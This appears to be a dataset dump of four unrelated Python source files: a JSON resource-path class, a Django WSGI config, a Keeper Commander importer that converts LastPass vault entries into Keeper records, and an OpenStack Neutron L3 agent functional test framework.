text
stringlengths 2
999k
|
|---|
class JsonRes:
craftplan = 'json/craftplan.json'
category_to_icon_en = 'json/en/category_to_icon_en.json'
words_en = 'json/en/words_en.json'
items_en = 'json/en/items_en.json'
material_to_icon_en = 'json/en/material_to_icon_en.json'
plans_en = 'json/en/plans_en.json'
materials_en = 'json/en/materials_en.json'
items_fr = 'json/fr/items_fr.json'
materials_fr = 'json/fr/materials_fr.json'
words_fr = 'json/fr/words_fr.json'
plans_fr = 'json/fr/plans_fr.json'
category_to_icon_fr = 'json/fr/category_to_icon_fr.json'
material_to_icon_fr = 'json/fr/material_to_icon_fr.json'
@classmethod
def get(cls, string):
return cls.__getattribute__(cls, string)
|
"""
WSGI config for hc project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from django.contrib.staticfiles.handlers import StaticFilesHandler
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hc.settings")
application = StaticFilesHandler(get_wsgi_application())
|
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Copyright 2021 Keeper Security Inc.
# Contact: ops@keepersecurity.com
#
import calendar
import datetime
import getpass
import json
import logging
from typing import Optional, List
from ..importer import BaseImporter, Record, Folder, RecordField, RecordReferences, SharedFolder, Permission
from .account import Account
from .exceptions import LastPassUnknownError
from .vault import Vault
class LastPassImporter(BaseImporter):
def __init__(self):
self.addresses = [] # type: List[LastPassAddress]
self.months = {}
_months = ['', 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August',
'September', 'October', 'November', 'December']
for i in range(len(_months)):
if _months[i]:
month = _months[i].casefold()
if month not in self.months:
self.months[month] = i
for i in range(len(calendar.month_name)):
if calendar.month_name[i]:
month = calendar.month_name[i].casefold()
if month not in self.months:
self.months[month] = i
def card_expiration(self, from_lastpass): # type: (str) -> str
if from_lastpass:
comp = [x.strip().casefold() for x in from_lastpass.split(',')]
if len(comp) == 2 and all(comp):
try:
year = int(comp[1])
if year < 200:
year += 2000
comp[1] = str(year)
except ValueError:
pass
if comp[0] in self.months:
return f'{self.months[comp[0]]:0>2}/{comp[1]}'
return from_lastpass
def lastpass_date(self, from_lastpass): # type: (str) -> int
if from_lastpass:
comp = [x.strip().casefold() for x in from_lastpass.split(',')]
if len(comp) == 3 and all(comp):
try:
month = self.months[comp[0]]
day = int(comp[1])
year = int(comp[2])
dt = datetime.date(year, month, day)
return int(datetime.datetime.fromordinal(dt.toordinal()).timestamp() * 1000)
except:
pass
return -1
def find_address(self, address): # type: (LastPassAddress) -> Optional[int]
for i in range(len(self.addresses)):
if self.addresses[i] == address:
return i + 1
def append_address(self, address): # type: (LastPassAddress) -> Optional[int]
if isinstance(address, LastPassAddress):
self.addresses.append(address)
return len(self.addresses)
def parse_typed_notes(self, notes): # type: (str) -> dict
lines = notes.split('\n')
fields = {}
key = ''
value = ''
for line in lines:
k, s, v = line.partition(':')
if s == ':':
if key:
if key == 'Notes':
value += line
elif key == 'Private Key':
if k == 'Public Key':
fields[key] = value
key = k
value = v
else:
value += '\n' + line
else:
fields[key] = value
key = k
value = v
else:
key = k
value = v
else:
if key:
value += '\n' + line
if key:
fields[key] = value
return fields
def do_import(self, name):
username = name
password = getpass.getpass(prompt='...' + 'LastPass Password'.rjust(30) + ': ', stream=None)
print('Press <Enter> if account is not protected with Multifactor Authentication')
twofa_code = getpass.getpass(prompt='...' + 'Multifactor Password'.rjust(30) + ': ', stream=None)
if not twofa_code:
twofa_code = None
try:
vault = Vault.open_remote(username, password, multifactor_password=twofa_code)
except LastPassUnknownError as lpe:
logging.warning(lpe)
return
else:
if len(vault.errors) > 0:
err_list = '\n'.join(vault.errors)
logging.warning(f'The following errors occurred retrieving Lastpass shared folder members:\n{err_list}')
for shared_folder in vault.shared_folders:
folder = SharedFolder()
folder.path = shared_folder.name
folder.permissions = []
for member in shared_folder.members:
perm = Permission()
perm.name = member['username']
perm.manage_records = member['readonly'] == '0'
perm.manage_users = member['can_administer'] == '1'
folder.permissions.append(perm)
for team in shared_folder.teams:
perm = Permission()
perm.name = team['name']
perm.manage_records = team['readonly'] == '0'
perm.manage_users = team['can_administer'] == '1'
folder.permissions.append(perm)
yield folder
for account in vault.accounts: # type: Account
record = Record()
if account.name:
record.title = account.name.decode('utf-8')
if account.username:
record.login = account.username.decode('utf-8')
if account.password:
record.password = account.password.decode('utf-8')
if account.url:
record.login_url = account.url.decode('utf-8')
if record.login_url == 'http://sn':
record.login_url = None
elif record.login_url == 'http://group':
continue
if account.notes:
notes = account.notes.decode('utf-8')
if notes.startswith('NoteType:'):
typed_values = self.parse_typed_notes(notes)
if 'NoteType' in typed_values:
note_type = typed_values.pop('NoteType', '')
notes = typed_values.pop('Notes', '')
typed_values.pop('Language', None)
if note_type == 'Bank Account':
self.populate_bank_account(record, typed_values)
elif note_type == 'Credit Card':
self.populate_credit_card(record, typed_values)
elif note_type == 'Address':
address = LastPassAddress.from_lastpass(typed_values)
if address:
addr_ref = self.append_address(address)
if addr_ref:
record.uid = addr_ref
self.populate_address_only(record, address)
self.populate_address(record, typed_values)
elif note_type == 'Driver\'s License':
address_record = self.populate_driver_license(record, typed_values)
if address_record is not None:
yield address_record
elif note_type == 'Passport':
self.populate_passport(record, typed_values)
elif note_type == 'Social Security':
self.populate_ssn_card(record, typed_values)
elif note_type == 'Health Insurance' or note_type == 'Insurance':
self.populate_health_insurance(record, typed_values)
elif note_type == 'Membership':
self.populate_membership(record, typed_values)
elif note_type == 'Email Account' or note_type == 'Instant Messenger':
record.type = 'login'
elif note_type == 'Database':
self.populate_database(record, typed_values)
elif note_type == 'Server':
self.populate_server(record, typed_values)
elif note_type == 'SSH Key':
self.populate_ssh_key(record, typed_values)
elif note_type == 'Software License':
self.populate_software_license(record, typed_values)
username = typed_values.pop('Username', '')
if username:
if record.login:
if record.login != username:
cf = RecordField(label='Username', value=username)
if record.type:
cf.type = 'login'
record.fields.append(cf)
else:
record.login = username
password = typed_values.pop('Password', '')
if password:
if record.password:
if record.password != password:
cf = RecordField(label='Password', value=password)
if record.type:
cf.type = 'password'
record.fields.append(cf)
else:
record.password = password
url = typed_values.pop('URL', '')
if url:
if record.login_url:
if record.login_url != url:
cf = RecordField(label='URL', value=url)
if record.type:
cf.type = 'url'
record.fields.append(cf)
else:
record.login_url = url
for key in typed_values:
value = typed_values[key]
if value:
if record.type:
cf = RecordField(type='text', label=key, value=str(value))
else:
cf = RecordField(label=key, value=str(value))
record.fields.append(cf)
record.notes = notes
if account.group or account.shared_folder:
fol = Folder()
if account.shared_folder:
fol.domain = account.shared_folder.name
if account.group:
fol.path = account.group.decode('utf-8')
record.folders = [fol]
yield record
def populate_address(self, record, notes): # type: (Record, dict) -> None
person = LastPassPersonName()
person.first = notes.pop('First Name', '')
person.middle = notes.pop('Middle Name', '')
person.last = notes.pop('Last Name', '')
if person.first or person.last:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
dt = self.lastpass_date(notes.pop('Birthday', None))
if dt != -1:
dtf = RecordField(type='birthDate', value=dt)
record.fields.append(dtf)
email = notes.pop('Email Address', None)
if email:
dtf = RecordField(type='email', value=email)
record.fields.append(dtf)
for phone_type in ['Phone', 'Evening Phone', 'Mobile Phone', 'Fax']:
phone = notes.pop(phone_type, '')
if phone:
try:
phone_dict = json.loads(phone)
if isinstance(phone_dict, dict):
if 'num' in phone_dict:
phone_number = phone_dict['num']
phone_ext = phone_dict.get('ext') or ''
phone_country_code = phone_dict.get('cc3l') or ''
phf = RecordField(type='phone', label=phone_type)
phf.value = {
# 'region': phone_country_code,
'number': phone_number,
'ext': phone_ext,
'type': ('Mobile' if phone_type.startswith('Mobile') else
'Home' if phone_type.startswith('Evening') else
'Work')
}
record.fields.append(phf)
except:
pass
def populate_address_only(self, record, lastpass_address): # type: (Record, LastPassAddress) -> None
if lastpass_address:
record.type = 'address'
address = RecordField(type='address')
address.value = {
'street1': lastpass_address.street1 or '',
'street2': lastpass_address.street2 or '',
'city': lastpass_address.city or '',
'state': lastpass_address.state or '',
'zip': lastpass_address.zip or '',
'country': lastpass_address.country or '',
}
record.fields.append(address)
def populate_credit_card(self, record, notes): # type: (Record, dict) -> None
record.type = 'bankCard'
card = RecordField(type='paymentCard')
card.value = {
'cardNumber': notes.pop('Number', ''),
'cardExpirationDate': self.card_expiration(notes.pop('Expiration Date', '')),
'cardSecurityCode': notes.pop('Security Code', '')
}
record.fields.append(card)
card_holder = RecordField(type='text', label='cardholderName', value=notes.pop('Name on Card', ''))
record.fields.append(card_holder)
dt = self.lastpass_date(notes.pop('Start Date', None))
if dt != -1:
dtf = RecordField(type='date', label='Start Date', value=dt)
record.fields.append(dtf)
def populate_bank_account(self, record, notes): # type: (Record, dict) -> None
record.type = 'bankAccount'
bank = RecordField(type='bankAccount')
bank.value = {
'accountType': notes.pop('Account Type', ''),
'routingNumber': notes.pop('Routing Number', ''),
'accountNumber': notes.pop('Account Number', ''),
}
record.fields.append(bank)
bank_name = notes.pop('Bank Name', '')
if bank_name:
record.title = bank_name
def populate_passport(self, record, notes): # type: (Record, dict) -> None
record.type = 'passport'
number = RecordField(type='accountNumber', label='passportNumber', value=notes.pop('Number', None))
record.fields.append(number)
person = LastPassPersonName.from_lastpass(notes.pop('Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
dt = self.lastpass_date(notes.pop('Date of Birth', None))
if dt != -1:
dtf = RecordField(type='birthDate', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Expiration Date', None))
if dt != -1:
dtf = RecordField(type='expirationDate', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Issued Date', None))
if dt != -1:
dtf = RecordField(type='date', label='dateIssued', value=dt)
record.fields.append(dtf)
def populate_driver_license(self, record, notes): # type: (Record, dict) -> Optional[Record]
record.type = 'driverLicense'
account_number = RecordField(type='accountNumber', label='dlNumber', value=notes.pop('Number', ''))
record.fields.append(account_number)
dt = self.lastpass_date(notes.pop('Expiration Date', None))
if dt != -1:
dtf = RecordField(type='expirationDate', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Date of Birth', None))
if dt != -1:
dtf = RecordField(type='birthDate', value=dt)
record.fields.append(dtf)
person = LastPassPersonName.from_lastpass(notes.pop('Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
address = LastPassAddress.from_lastpass(notes)
address_record = None
if address:
ref_no = self.find_address(address)
if ref_no:
if record.references is None:
record.references = []
address_ref = next((x for x in record.references if x.type == 'address'), None)
if address_ref is None:
address_ref = RecordReferences(type='address')
record.references.append(address_ref)
address_ref.uids.append(ref_no)
return address_record
def populate_ssn_card(self, record, notes): # type: (Record, dict) -> None
record.type = 'ssnCard'
number = RecordField(type='accountNumber', label='identityNumber', value=notes.pop('Number', None))
record.fields.append(number)
person = LastPassPersonName.from_lastpass(notes.pop('Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
def populate_health_insurance(self, record, notes): # type: (Record, dict) -> None
record.type = 'healthInsurance'
number = RecordField(type='accountNumber', value=notes.pop('Policy Number', None))
record.fields.append(number)
def populate_membership(self, record, notes): # type: (Record, dict) -> None
record.type = 'membership'
number = RecordField(type='accountNumber', value=notes.pop('Membership Number', None))
record.fields.append(number)
person = LastPassPersonName.from_lastpass(notes.pop('Member Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
dt = self.lastpass_date(notes.pop('Start Date', None))
if dt != -1:
dtf = RecordField(type='date', label='Start Date', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Expiration Date', None))
if dt != -1:
dtf = RecordField(type='date', label='Expiration Date', value=dt)
record.fields.append(dtf)
def populate_database(self, record, notes): # type: (Record, dict) -> None
record.type = 'databaseCredentials'
db_type = RecordField(type='text', label='type', value=notes.pop('Type', None))
record.fields.append(db_type)
host = RecordField(type='host')
host.value = {
'hostName': notes.pop('Hostname', ''),
'port': notes.pop('Port', ''),
}
record.fields.append(host)
record.login_url = ''
def populate_server(self, record, notes): # type: (str, Record, dict) -> None
record.type = 'serverCredentials'
host = RecordField(type='host')
host.value = {
'hostName': notes.pop('Hostname', ''),
'port': notes.pop('Port', ''),
}
record.fields.append(host)
def populate_ssh_key(self, record, notes): # type: (Record, dict) -> None
record.type = 'sshKeys'
passphrase = notes.pop('Passphrase', None)
if passphrase:
if record.password:
if record.password != passphrase:
passphrase = RecordField(type='password', label='passphrase', value=passphrase)
record.fields.append(passphrase)
else:
record.password = passphrase
host = RecordField(type='host')
host.value = {
'hostName': notes.pop('Hostname', ''),
'port': notes.pop('Port', ''),
}
record.fields.append(host)
private_key = notes.pop('Private Key', None)
public_key = notes.pop('Public Key', None)
if private_key or public_key:
value = {
'privateKey': private_key,
'publicKey': public_key
}
pk = RecordField(type='keyPair', value=value)
record.fields.append(pk)
dt = self.lastpass_date(notes.pop('Date', None))
if dt != -1:
dtf = RecordField(type='date', value=dt)
record.fields.append(dtf)
def populate_software_license(self, record, notes): # type: (Record, dict) -> None
record.type = 'softwareLicense'
number = RecordField(type='licenseNumber', value=notes.pop('License Key', None))
record.fields.append(number)
dt = self.lastpass_date(notes.pop('Purchase Date', None))
if dt != -1:
dtf = RecordField(type='date', label='dateActive', value=dt)
record.fields.append(dtf)
class LastPassPersonName(object):
def __init__(self):
self.first = ''
self.middle = ''
self.last = ''
@staticmethod
def from_lastpass(name): # type: (str) -> 'Optional[LastPassPersonName]'
if not name:
return None
if not isinstance(name, str):
return None
person = LastPassPersonName()
last, sep, other = name.partition(',')
if sep == ',':
person.last = last.strip()
comps = [x for x in other.strip().split(' ') if x]
else:
comps = [x for x in name.split(' ') if x]
person.last = comps.pop(-1)
if len(comps) > 0:
person.first = comps.pop(0)
if len(comps) > 0:
person.middle = ' '.join(comps)
if not person.first and not person.last:
return None
return person
class LastPassAddress(object):
def __init__(self):
self.street1 = ''
self.street2 = ''
self.city = ''
self.state = ''
self.zip = ''
self.country = ''
@staticmethod
def _compare_case_insensitive(s1, s2): # type: (any, any) -> bool
if isinstance(s1, str) and isinstance(s2, str):
return s1.casefold() == s2.casefold()
if s1 is None and s2 is None:
return True
return False
def __eq__(self, other):
if not isinstance(other, LastPassAddress):
return False
return (self._compare_case_insensitive(self.street1, other.street1) and
self._compare_case_insensitive(self.street2, other.street2) and
self._compare_case_insensitive(self.city, other.city) and
self._compare_case_insensitive(self.state, other.state))
@staticmethod
def from_lastpass(notes): # type: (dict) -> 'Optional[LastPassAddress]'
if not isinstance(notes, dict):
return None
address = LastPassAddress()
if 'Address 1' in notes:
address.street1 = notes.pop('Address 1', '')
address.street2 = notes.pop('Address 2', '')
elif 'Address' in notes:
s1, sep, s2 = notes.pop('Address', '').partition(',')
address.street1 = s1.strip()
if sep == ',':
address.street2 = s2.strip()
else:
return None
address.city = notes.pop('City / Town', '')
address.state = notes.pop('State', '')
address.zip = notes.pop('Zip / Postal Code', '')
address.country = notes.pop('Country', '')
return address
|
# Copyright (c) 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import functools
import textwrap
import mock
import netaddr
from neutron_lib import constants
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
import testtools
from neutron.agent.common import ovs_lib
from neutron.agent.l3 import agent as neutron_l3_agent
from neutron.agent.l3 import namespaces
from neutron.agent.l3 import router_info as l3_router_info
from neutron.agent import l3_agent as l3_agent_main
from neutron.agent.linux import external_process
from neutron.agent.linux import interface
from neutron.agent.linux import ip_lib
from neutron.agent.linux import keepalived
from neutron.common import constants as n_const
from neutron.common import utils as common_utils
from neutron.conf.agent import common as agent_config
from neutron.conf import common as common_config
from neutron.tests.common import l3_test_common
from neutron.tests.common import net_helpers
from neutron.tests.functional import base
_uuid = uuidutils.generate_uuid
OVS_INTERFACE_DRIVER = 'neutron.agent.linux.interface.OVSInterfaceDriver'
def get_ovs_bridge(br_name):
return ovs_lib.OVSBridge(br_name)
class L3AgentTestFramework(base.BaseSudoTestCase):
INTERFACE_DRIVER = OVS_INTERFACE_DRIVER
NESTED_NAMESPACE_SEPARATOR = '@'
def setUp(self):
super(L3AgentTestFramework, self).setUp()
self.mock_plugin_api = mock.patch(
'neutron.agent.l3.agent.L3PluginApi').start().return_value
mock.patch('neutron.agent.rpc.PluginReportStateAPI').start()
self.conf = self._configure_agent('agent1')
self.agent = neutron_l3_agent.L3NATAgentWithStateReport('agent1',
self.conf)
def _get_config_opts(self):
config = cfg.ConfigOpts()
config.register_opts(common_config.core_opts)
config.register_opts(common_config.core_cli_opts)
logging.register_options(config)
agent_config.register_process_monitor_opts(config)
return config
def _configure_agent(self, host, agent_mode='dvr_snat'):
conf = self._get_config_opts()
l3_agent_main.register_opts(conf)
conf.set_override('interface_driver', self.INTERFACE_DRIVER)
br_int = self.useFixture(net_helpers.OVSBridgeFixture()).bridge
br_ex = self.useFixture(net_helpers.OVSBridgeFixture()).bridge
conf.set_override('ovs_integration_bridge', br_int.br_name)
conf.set_override('external_network_bridge', br_ex.br_name)
temp_dir = self.get_new_temp_dir()
get_temp_file_path = functools.partial(self.get_temp_file_path,
root=temp_dir)
conf.set_override('state_path', temp_dir.path)
conf.set_override('log_file',
get_temp_file_path('log_file'))
conf.set_override('metadata_proxy_socket',
get_temp_file_path('metadata_proxy'))
conf.set_override('ha_confs_path',
get_temp_file_path('ha_confs'))
conf.set_override('external_pids',
get_temp_file_path('external/pids'))
conf.set_override('host', host)
conf.set_override('agent_mode', agent_mode)
return conf
def _get_agent_ovs_integration_bridge(self, agent):
return get_ovs_bridge(agent.conf.ovs_integration_bridge)
def generate_router_info(self, enable_ha,
ip_version=constants.IP_VERSION_4,
extra_routes=True,
enable_fip=True, enable_snat=True,
num_internal_ports=1,
dual_stack=False, v6_ext_gw_with_sub=True,
qos_policy_id=None):
if ip_version == constants.IP_VERSION_6 and not dual_stack:
enable_snat = False
enable_fip = False
extra_routes = False
return l3_test_common.prepare_router_data(ip_version=ip_version,
enable_snat=enable_snat,
num_internal_ports=(
num_internal_ports),
enable_floating_ip=enable_fip,
enable_ha=enable_ha,
extra_routes=extra_routes,
dual_stack=dual_stack,
v6_ext_gw_with_sub=(
v6_ext_gw_with_sub),
qos_policy_id=qos_policy_id)
def _test_conntrack_disassociate_fip(self, ha):
'''Test that conntrack immediately drops stateful connection
that uses floating IP once it's disassociated.
'''
router_info = self.generate_router_info(enable_ha=ha)
router = self.manage_router(self.agent, router_info)
port = net_helpers.get_free_namespace_port(
constants.PROTO_NAME_TCP, router.ns_name)
client_address = '19.4.4.3'
server_address = '35.4.0.4'
def clean_fips(router):
router.router[constants.FLOATINGIP_KEY] = []
clean_fips(router)
self._add_fip(router, client_address, fixed_address=server_address)
router.process()
router_ns = ip_lib.IPWrapper(namespace=router.ns_name)
netcat = net_helpers.NetcatTester(
router.ns_name, router.ns_name, client_address, port,
protocol=net_helpers.NetcatTester.TCP)
self.addCleanup(netcat.stop_processes)
def assert_num_of_conntrack_rules(n):
out = router_ns.netns.execute(["conntrack", "-L",
"--orig-src", client_address])
self.assertEqual(
n, len([line for line in out.strip().split('\n') if line]))
if ha:
common_utils.wait_until_true(lambda: router.ha_state == 'master')
with self.assert_max_execution_time(100):
assert_num_of_conntrack_rules(0)
self.assertTrue(netcat.test_connectivity())
assert_num_of_conntrack_rules(1)
clean_fips(router)
router.process()
assert_num_of_conntrack_rules(0)
with testtools.ExpectedException(RuntimeError):
netcat.test_connectivity()
def _test_update_floatingip_statuses(self, router_info):
router = self.manage_router(self.agent, router_info)
rpc = self.agent.plugin_rpc.update_floatingip_statuses
self.assertTrue(rpc.called)
# Assert that every defined FIP is updated via RPC
expected_fips = set([
(fip['id'], constants.FLOATINGIP_STATUS_ACTIVE) for fip in
router.router[constants.FLOATINGIP_KEY]])
call = [args[0] for args in rpc.call_args_list][0]
actual_fips = set(
[(fip_id, status) for fip_id, status in call[2].items()])
self.assertEqual(expected_fips, actual_fips)
def _gateway_check(self, gateway_ip, external_device):
expected_gateway = gateway_ip
ip_vers = netaddr.IPAddress(expected_gateway).version
existing_gateway = (external_device.route.get_gateway(
ip_version=ip_vers).get('gateway'))
self.assertEqual(expected_gateway, existing_gateway)
def _assert_ha_device(self, router):
def ha_router_dev_name_getter(not_used):
return router.get_ha_device_name()
self.assertTrue(self.device_exists_with_ips_and_mac(
router.router[constants.HA_INTERFACE_KEY],
ha_router_dev_name_getter, router.ns_name))
def _assert_gateway(self, router, v6_ext_gw_with_sub=True):
external_port = router.get_ex_gw_port()
external_device_name = router.get_external_device_name(
external_port['id'])
external_device = ip_lib.IPDevice(external_device_name,
namespace=router.ns_name)
for subnet in external_port['subnets']:
self._gateway_check(subnet['gateway_ip'], external_device)
if not v6_ext_gw_with_sub:
self._gateway_check(self.agent.conf.ipv6_gateway,
external_device)
def _check_external_device(self, router):
external_port = router.get_ex_gw_port()
return (self.device_exists_with_ips_and_mac(
external_port, router.get_external_device_name,
router.ns_name))
def _assert_external_device(self, router):
self.assertTrue(self._check_external_device(router))
def _assert_ipv6_accept_ra(self, router, enabled=True):
external_port = router.get_ex_gw_port()
external_device_name = router.get_external_device_name(
external_port['id'])
ip_wrapper = ip_lib.IPWrapper(namespace=router.ns_name)
ra_state = ip_wrapper.netns.execute(['sysctl', '-b',
'net.ipv6.conf.%s.accept_ra' % external_device_name])
self.assertEqual(enabled, int(ra_state) != n_const.ACCEPT_RA_DISABLED)
def _assert_ipv6_forwarding(self, router, enabled=True):
external_port = router.get_ex_gw_port()
external_device_name = router.get_external_device_name(
external_port['id'])
ip_wrapper = ip_lib.IPWrapper(namespace=router.ns_name)
fwd_state = ip_wrapper.netns.execute(['sysctl', '-b',
'net.ipv6.conf.%s.forwarding' % external_device_name])
self.assertEqual(int(enabled), int(fwd_state))
def _router_lifecycle(self, enable_ha, ip_version=constants.IP_VERSION_4,
dual_stack=False, v6_ext_gw_with_sub=True,
router_info=None):
router_info = router_info or self.generate_router_info(
enable_ha, ip_version, dual_stack=dual_stack,
v6_ext_gw_with_sub=(v6_ext_gw_with_sub))
return_copy = copy.deepcopy(router_info)
router = self.manage_router(self.agent, router_info)
# Add multiple-IPv6-prefix internal router port
slaac = constants.IPV6_SLAAC
slaac_mode = {'ra_mode': slaac, 'address_mode': slaac}
subnet_modes = [slaac_mode] * 2
self._add_internal_interface_by_subnet(router.router,
count=2, ip_version=constants.IP_VERSION_6,
ipv6_subnet_modes=subnet_modes)
router.process()
if enable_ha:
port = router.get_ex_gw_port()
interface_name = router.get_external_device_name(port['id'])
self._assert_no_ip_addresses_on_interface(router.ns_name,
interface_name)
common_utils.wait_until_true(lambda: router.ha_state == 'master')
# Keepalived notifies of a state transition when it starts,
# not when it ends. Thus, we have to wait until keepalived finishes
# configuring everything. We verify this by waiting until the last
# device has an IP address.
device = router.router[constants.INTERFACE_KEY][-1]
device_exists = functools.partial(
self.device_exists_with_ips_and_mac,
device,
router.get_internal_device_name,
router.ns_name)
common_utils.wait_until_true(device_exists)
self.assertTrue(self._namespace_exists(router.ns_name))
common_utils.wait_until_true(
lambda: self._metadata_proxy_exists(self.agent.conf, router))
self._assert_internal_devices(router)
self._assert_external_device(router)
if not (enable_ha and
(ip_version == constants.IP_VERSION_6 or dual_stack)):
# Note(SridharG): enable the assert_gateway for IPv6 once
# keepalived on Ubuntu14.04 (i.e., check-neutron-dsvm-functional
# platform) is updated to 1.2.10 (or above).
# For more details: https://review.openstack.org/#/c/151284/
self._assert_gateway(router, v6_ext_gw_with_sub)
self.assertTrue(self.floating_ips_configured(router))
self._assert_snat_chains(router)
self._assert_floating_ip_chains(router)
self._assert_iptables_rules_converged(router)
self._assert_extra_routes(router)
if (ip_version == constants.IP_VERSION_6 or dual_stack):
ip_versions = [constants.IP_VERSION_4, constants.IP_VERSION_6]
else:
ip_versions = [constants.IP_VERSION_4]
self._assert_onlink_subnet_routes(router, ip_versions)
self._assert_metadata_chains(router)
# Verify router gateway interface is configured to receive Router Advts
# when IPv6 is enabled and no IPv6 gateway is configured.
if router.use_ipv6 and not v6_ext_gw_with_sub:
if not self.agent.conf.ipv6_gateway:
self._assert_ipv6_accept_ra(router)
if enable_ha:
self._assert_ha_device(router)
common_utils.wait_until_true(
lambda: router.keepalived_manager.get_process().active,
timeout=15)
self._delete_router(self.agent, router.router_id)
self._assert_interfaces_deleted_from_ovs()
self._assert_router_does_not_exist(router)
if enable_ha:
common_utils.wait_until_true(
lambda: not router.keepalived_manager.get_process().active,
timeout=15)
return return_copy
def manage_router(self, agent, router):
self.addCleanup(agent._safe_router_removed, router['id'])
# NOTE(mangelajo): Neutron functional for l3 don't rely on openvswitch
# agent tagging ports, and all ports remain untagged
# during test execution.
# Workaround related to lp#1767422 plugs new ports as
# dead vlan (4095) to avoid issues, we need to remove
# such tag during functional l3 testing.
original_plug_new = interface.OVSInterfaceDriver.plug_new
def new_ovs_plug(self, *args, **kwargs):
original_plug_new(self, *args, **kwargs)
bridge = (kwargs.get('bridge') or args[4] or
self.conf.ovs_integration_bridge)
device_name = kwargs.get('device_name') or args[2]
ovsbr = ovs_lib.OVSBridge(bridge)
ovsbr.clear_db_attribute('Port', device_name, 'tag')
with mock.patch(OVS_INTERFACE_DRIVER + '.plug_new', autospec=True) as (
ovs_plug):
ovs_plug.side_effect = new_ovs_plug
agent._process_added_router(router)
return agent.router_info[router['id']]
def _delete_router(self, agent, router_id):
agent._router_removed(router_id)
def _add_fip(self, router, fip_address, fixed_address='10.0.0.2',
host=None, fixed_ip_address_scope=None):
fip = {'id': _uuid(),
'port_id': _uuid(),
'floating_ip_address': fip_address,
'fixed_ip_address': fixed_address,
'host': host,
'fixed_ip_address_scope': fixed_ip_address_scope}
router.router[constants.FLOATINGIP_KEY].append(fip)
def _add_internal_interface_by_subnet(self, router, count=1,
ip_version=constants.IP_VERSION_4,
ipv6_subnet_modes=None,
interface_id=None):
return l3_test_common.router_append_subnet(router, count,
ip_version, ipv6_subnet_modes, interface_id)
def _namespace_exists(self, namespace):
return ip_lib.network_namespace_exists(namespace)
def _metadata_proxy_exists(self, conf, router):
pm = external_process.ProcessManager(
conf,
router.router_id,
router.ns_name)
return pm.active
def device_exists_with_ips_and_mac(self, expected_device, name_getter,
namespace):
ip_cidrs = common_utils.fixed_ip_cidrs(expected_device['fixed_ips'])
return ip_lib.device_exists_with_ips_and_mac(
name_getter(expected_device['id']), ip_cidrs,
expected_device['mac_address'], namespace)
@staticmethod
def _port_first_ip_cidr(port):
fixed_ip = port['fixed_ips'][0]
return common_utils.ip_to_cidr(fixed_ip['ip_address'],
fixed_ip['prefixlen'])
def get_device_mtu(self, target_device, name_getter, namespace):
device = ip_lib.IPDevice(name_getter(target_device), namespace)
return device.link.mtu
def get_expected_keepalive_configuration(self, router):
ha_device_name = router.get_ha_device_name()
external_port = router.get_ex_gw_port()
ex_port_ipv6 = ip_lib.get_ipv6_lladdr(external_port['mac_address'])
ex_device_name = router.get_external_device_name(
external_port['id'])
external_device_cidr = self._port_first_ip_cidr(external_port)
internal_port = router.router[constants.INTERFACE_KEY][0]
int_port_ipv6 = ip_lib.get_ipv6_lladdr(internal_port['mac_address'])
internal_device_name = router.get_internal_device_name(
internal_port['id'])
internal_device_cidr = self._port_first_ip_cidr(internal_port)
floating_ip_cidr = common_utils.ip_to_cidr(
router.get_floating_ips()[0]['floating_ip_address'])
default_gateway_ip = external_port['subnets'][0].get('gateway_ip')
extra_subnet_cidr = external_port['extra_subnets'][0].get('cidr')
return textwrap.dedent("""\
global_defs {
notification_email_from %(email_from)s
router_id %(router_id)s
}
vrrp_instance VR_1 {
state BACKUP
interface %(ha_device_name)s
virtual_router_id 1
priority 50
garp_master_delay 60
nopreempt
advert_int 2
track_interface {
%(ha_device_name)s
}
virtual_ipaddress {
169.254.0.1/24 dev %(ha_device_name)s
}
virtual_ipaddress_excluded {
%(floating_ip_cidr)s dev %(ex_device_name)s
%(external_device_cidr)s dev %(ex_device_name)s
%(internal_device_cidr)s dev %(internal_device_name)s
%(ex_port_ipv6)s dev %(ex_device_name)s scope link
%(int_port_ipv6)s dev %(internal_device_name)s scope link
}
virtual_routes {
0.0.0.0/0 via %(default_gateway_ip)s dev %(ex_device_name)s
8.8.8.0/24 via 19.4.4.4
%(extra_subnet_cidr)s dev %(ex_device_name)s scope link
}
}""") % {
'email_from': keepalived.KEEPALIVED_EMAIL_FROM,
'router_id': keepalived.KEEPALIVED_ROUTER_ID,
'ha_device_name': ha_device_name,
'ex_device_name': ex_device_name,
'external_device_cidr': external_device_cidr,
'internal_device_name': internal_device_name,
'internal_device_cidr': internal_device_cidr,
'floating_ip_cidr': floating_ip_cidr,
'default_gateway_ip': default_gateway_ip,
'int_port_ipv6': int_port_ipv6,
'ex_port_ipv6': ex_port_ipv6,
'extra_subnet_cidr': extra_subnet_cidr,
}
